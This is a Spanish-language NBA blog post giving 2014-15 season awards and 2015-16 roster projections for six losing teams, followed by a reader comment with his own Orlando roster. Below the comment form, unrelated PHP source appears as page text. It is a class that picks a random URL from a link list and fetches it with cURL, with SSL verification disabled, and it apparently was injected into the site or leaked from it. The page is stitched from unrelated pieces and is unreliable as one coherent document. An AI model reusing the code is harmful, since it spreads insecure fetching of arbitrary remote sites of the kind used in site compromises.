Premios 2014-15: Los reguleros

06 de July de 2015 por TheDeerHunter

Orlando Magic (25-57)

Eran firmes candidatos a “infames” del curso, pero nadie esperaba mejores resultados y, en cambio, sí han ido aconteciendo situaciones positivas más o menos inesperadas. Terminó al fin la era Vaughn, con mayor pena e ínfima gloria, y llega Scott Schiles, que apunta a mejora. También han tratado de mostrar las garras en el mercado de agentes libres, una señal de que sus aspiraciones son mayores.

Premios Magic 2014/15

  • MVP: El montenegrino Nikola Vucevic, nuevamente descomunal. No se ha ganado el derecho a estar en el all-star pero sí una extensión de contrato muy jugosa.
  • El rookie: Elfrid Payton ha sido el mejor base novato del año con cierta diferencia. Sólo le falta aprender a enchufarlas desde más allá de 5 metros.
  • La sorpresa: Evan Fournier ofreció buenos momentos en la primera mitad de la temporada, por el contrario se perdió 21 de los últimos 23 choques por un problema en la cadera.
  • La decepción: El fichaje de Channing Frye el pasado verano fue bastante desconcertante, pero además su rendimiento ha sido horroroso, incapaz de abrir el campo para ayudar a Vucevic.
  • El mayor esfuerzo en vano: No sabemos lo mucho que se han esforzado Harkless y Nicholson en los entrenamientos, pero sí sabemos lo en vano que ha sido a la hora de contar para el equipo.

Jugando a GM

Queda poco pescado por vender a estas alturas.

No ha habido grandes movimientos tras las calabazas de Millsap, aparte del draft. Se temía una renovación delirante de Tobias y sus 64 millones en 4 años parecen hasta moderados visto el nuevo panorama.

Aunque el deseado era Porzingis, han logrado mejorar la pegada exterior con las elecciones de Hezonja y Harvey, así como con la reciente contratación de CJ Watson. La intención del equipo debería ser mejorar sus posiciones interiores, especialmente tras la salida de Kyle O’Quinn dirección New York. El objetivo para sustituirle sería precisamente Quincy Acy.

PG: Elfrid Payton, CJ Watson
SG: Victor Oladipo, Evan Fournier, Tyler Harvey
SF: Tobias Harris, Aaron Gordon, Mario Hezonja, Maurice Harkless
PF: Dewayne Dedmon, Channing Frye
C: Nicola Vucevic, Andrew Nicholson

Detroit Pistons (32-50)

Se terminó el sueño de las torres gemelas en Detroit. Fracaso absoluto del ambicioso frontcourt que montaron hace un par de temporadas. Supuso un alivio la salida a cambio de nada de Josh Smith, no lo será tanto la de Monroe. Cuesta entender algunas decisiones pero la plantilla que dirigirá Stan Van Gundy la campaña que viene se antoja más compensada que las últimas.

Premios Pistons 2014/15

  • MVP: Irregular Andre Drummond, aunque indudablemente es el hombre elegido para liderar el proyecto.
  • El rookie: Spencer Dinwiddie no llega a un cuarto de hora de juego en apenas 34 partidos, pero sólo por su apellido le hemos cogido cariño.
  • La sorpresa+decepción: Lo bien que les llegó a ir sin Josh Smith.
  • El mayor esfuerzo en vano: Quien haya tratado de retener a Monroe, que cuajó una temporada notable en su año de expiring.

Jugando a GM

No han salido excesivamente bien parados en las críticas en torno al draft. Todo el mundo esperaba la elección de Winslow y en su lugar prefirieron a Stanley Johnson.

Las llegadas de PF con rango de tiro obedecen a filosofía de juego conocida, que deberían favorecer el desarrollo y la importancia de Drummond.

Los Pistons de la 15/16 están listos. Sin mucho brillo pero con opciones reales de ser uno de los 8 mejores de la conferencia.

PG: Reggie Jackson, Brandon Jennings
SG: Jodie Meeks, Kentavious Caldwell-Pope, Reggie Bullock
SF: Stanley Johnson, Cartier Martin, Tayshaun Prince
PF: Marcus Morris, Ersan Ilyasova, Anthony Tolliver
C: Andre Drummond, Aron Baynes

Charlotte Hornets (33-49)

Temporada perdida para los avispones. Tras las incorporaciones del verano pasado se esperaba primera ronda como mínimo, pero todo lo que podía ir mal efectivamente fue mal. Tras todas aquellas fallidas decisiones, Michael Jordan vuelve a la palestra como el anti-Midas por antonomasia. La elección de Kaminsky le pone aún más en entredicho. Nuevo y agresivo lavado de cara para intentar recuperar el pulso con el que finalizaron la campaña 2014.

Premios Hornets 2014/15:

  • MVP: Kemba Walker, omnipresente mientras ha estado disponible. Sólida campaña, mejorando su capacidad de liderazgo, aunque su nivel de acierto cara al aro necesita mejorar.
  • El rookie: Ni Vonleh ni Hairston olvidarán fácilmente su año de debut con Steve Clifford. Total marginación.
  • La sorpresa: Mo Williams, tras su periplo por Minneapolis, llegó a Charlotte en plan estelar, anotando como en sus años mozos en Milwuakee, para despertar a un público adormecido. Suena para salir del equipo, por cierto.
  • La decepción: Sabíamos que la contratación de Lance Stephenson suponía un riesgo que su talento podía compensar. Ha salido cruz.
  • El mayor esfuerzo en vano: Se cierra la etapa de Bismack Biyombo en Charlotte. Nadie le reprochará su esfuerzo pero se queda muy lejos de ser lo que muchos creyeron ver en él.

Jugando a GM

Los Hornets se han remozado parcialmente aunque no sabemos si en la dirección correcta. Tratan de minimizar sus problemas con el tiro exterior con la incorporación de Nicolas Batum, Jeremy Lamb y, probablemente, Frank Kaminsky. El pívot ha sido una elección relativamente controvertida, con el “fantasma” de Winslow sobrevolando varias elecciones. Si el jugador de los Heat triunfa arreciarán las críticas.

En cualquier caso, en este punto, no terminamos de adivinar el plan maestro para hacer competitiva esta plantilla.

PG: Kemba Walker, Mo Williams
SG: Nicolas Batum, Jeremy Lamb, Troy Daniels
SF: Michael Kidd-Gilchrist, P.J. Hairston
PF: Marvin Williams, Cody Zeller
C: Al Jefferson, Frank Kaminsky, Spencer Hawes

Miami Heat (37-45)

No era fácil pasar de pelear por el threepeat a conformarse con 37 victorias y fuera de unos “facilones” playoffs en el este. El maestro Riley trató de atenuar el golpe diseñando una plantilla que podía cumplir, pero los tempranos problemas de salud de Bosh dieron al traste con el plan. Tras la inevitable decepción, Riley ha vuelto a sacar un conejo de la chistera en forma de robo en el draft y de compensada plantilla para el próximo curso.

Premios Heat 2014/15

  • MVP: Dwayne Wade ya no es la bestia que llegó a ser, pero aquí le da para seguir siendo el hombre a buscar cuando todo lo demás falla.
  • El rookie: Shabazz Napier llegó a aportar buenos números, hasta el punto de hacer a Cole prescindible. Ahora lo tendrá más difícil junto a Dragic todo el año.
  • La sorpresa: Hassan Whiteside ha sido uno de los fenómenos de la temporada. Esperamos que no sea flor de un día.
  • La decepción: Ver a LeBron por la TV en la final.
  • El mayor esfuerzo en vano: Michael Beasley… la parida del día. Se lo otorgamos al grueso de la plantilla, excepto seguramente a él.

Jugando a GM

Pat Riley no se podía creer, cuando le tocó elegir en la 10ª elección del draft, que Justise Winslow estaba disponible. No se lo pensó dos veces. Parece una apuesta perfecta como jugador y persona dentro de la idiosincrasia que se trata de imprimir en la franquicia. Algunos comparan este caso al de Kawhi Leonard en 2011. La elección de Josh Richardson también se valora positivamente.

Antes de la noche del draft, no obstante, Riley ya tenía preparada una plantilla para dar mucha guerra en la postemporada del año que viene, si no pasa nada raro.

PG: Goran Dragic, Mario Chalmers, Shabazz Napier
SG: Dwayne Wade, Tyler Johnson, Josh Richardson
SF: Luol Deng, Justise Winslow, Henry Walker
PF: Chris Bosh, Josh McRoberts, Udonis Haslem
C: Hassan Whiteside, Chris Andersen

Phoenix Suns (39-43)

Nos temíamos batacazo tras ser el “equipo de todos” la temporada pasada. No esperábamos, sin embargo, una descomposición tan exagerada como la que está teniendo lugar allí. Se ha apostado fuerte por atraer a algún gran agente libre este verano y han fracasado de forma catastrófica. Tampoco estamos entendiendo demasiado bien algunas decisiones que se están tomando ni otras que, se comenta, pretenden tomar.

Premios Suns 2014/15

  • MVP: Eric Bledsoe. Su campaña más sólida y con mayor número de partidos disputados. Habrán pensado los Suns que sería buen momento para venderlo.
  • El rookie: T.J. Warren. Buen nivel del pick 14 del pasado draft. Se cuenta con él para el futuro… en principio.
  • La sorpresa: La que le han dado a Markieff Morris traspasando a su hermano.
  • La decepción: La salida por la puerta de atrás de Goran Dragic.
  • El mayor esfuerzo en vano: Los buenos momentos que dio Isaiah Thomas para terminar vendido de mala manera.

Jugando a GM

El único supuesto acierto ha sido la elección de Devin Booker en el draft, aspirante a ser uno de los mejores tiradores de su generación. El resto ha sido marear a todos sus jugadores en su intento por atraer a Aldridge, y todo para terminar firmando contratos caros y de dudosa eficacia a medio plazo. La improvisación no es buena.

A todo esto no veríamos con malos ojos la vuelta de Amar’e Stoudemire si el precio no es desorbitado.

PG: Eric Bledsoe, Brandon Knight
SG: Devin Booker, Archie Goodwin
SF: PJ Tucker, TJ Warren
PF: Markieff Morris, Amar’e Stoudemire, Earl Barron
C: Tyson Chandler, Alex Len

Indiana Pacers (38-44)

Tiene un punto injusto meter a los Pacers en este saco. Con la lesión de Paul George no esperábamos que se quedaran a las puertas de entrar en playoffs. Sin embargo tampoco esperábamos que el proyecto que nos deslumbró durante la primera parte del curso pasado haya acabado desintegrado tan pronto. Se abren nuevos horizontes.

Premios Pacers 2014/15

  • MVP: George Hill. Excelente campaña hasta que terminó lesionado. Posteriormente recogería el testigo Stuckey.
  • El rookie: Pocas satisfacciones para el croata Damjan Rudez en su primer año. Al menos el hombre puede decir que ha disfrutado de sus 15 minutos por partido.
  • La sorpresa+mayor esfuerzo en vano: Volver a ver a Stuckey a un gran nivel… pero menuda cara de tonto se le quedaría con el fichaje de Ellis.
  • La decepción: No entrar en playoffs. Lo merecieron.

Jugando a GM

Extraño giro de timón con el fichaje de Monta Ellis y las salidas cantadas de West y Hibbert. Myles Turner está sorprendiendo positivamente con sus primeros minutos con los Pacers. Sus características, como las del renovado Lavoy Allen, sirven para tapar algún parche, pero los Pacers deberían fichar con urgencia un Center. No queda mucho para elegir. Será interesante comprobar cómo se las apañan y si Vogel se sube al carro del small-ball con Paul George ejerciendo de 4.

PG: George Hill, Donald Sloan
SG: Monta Ellis, CJ Miles, Joseph Young
SF: Paul George, Solomon Hill, Chris Copeland, Damjan Rudez
PF: Myles Turner, Luis Scola
C: Ian Mahinmi, Lavoy Allen

Comenta

Un comentario a esta entrada

  1. Triceratops dice:
    #1

    Respecto a los Magic, como bien dices casi todo el pescado está vendido, lo único que falta quizas es un par de veteranos, a ser posibles interiores, que guien a todo el rebaño de veinteañeros que tienen los Magic.

    Jugando a GM, iría a por los agentes libres Reggie Evans y a por Dalembert que creo que es agente libre, sin darles mas allá del mínimo. Y traspasaría a Nicholson por cualquier cosa, ya sea cash ó una segunda ronda más baja que la tuya ó algo así.

    El contrato de Frye era una basura, pero tal y como está el mercado, ya se puede decir que es un contrato normal.
    Creo que Gordon jugará mas de PF que de SF, y Harris alternará ambas posiciones.
    Me haría especialmente ilusión si Skiles lograse desarrollar todo el potencial defensivo que tiene el menospreciado Harkless. Trabajando adecuadamente sobre este chico, creo que podría llegar a ser una versión de un notable jugador como Ariza.

    Con la supuesta evolución de los jovenes y un entrenador profesional después de 3 años, creo que hay mimbres mas que suficientes para llegar a Playoffs en la débil Conferencia Este

    PG: Payton, CJ Watson, Harvey
    SG: Oladipo, Fournier, Marble
    SF: Harris, Hezonja, Harkless
    PF: Gordon, Frye, Evans
    C: Vucevic, Dalembert, Dedmon.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>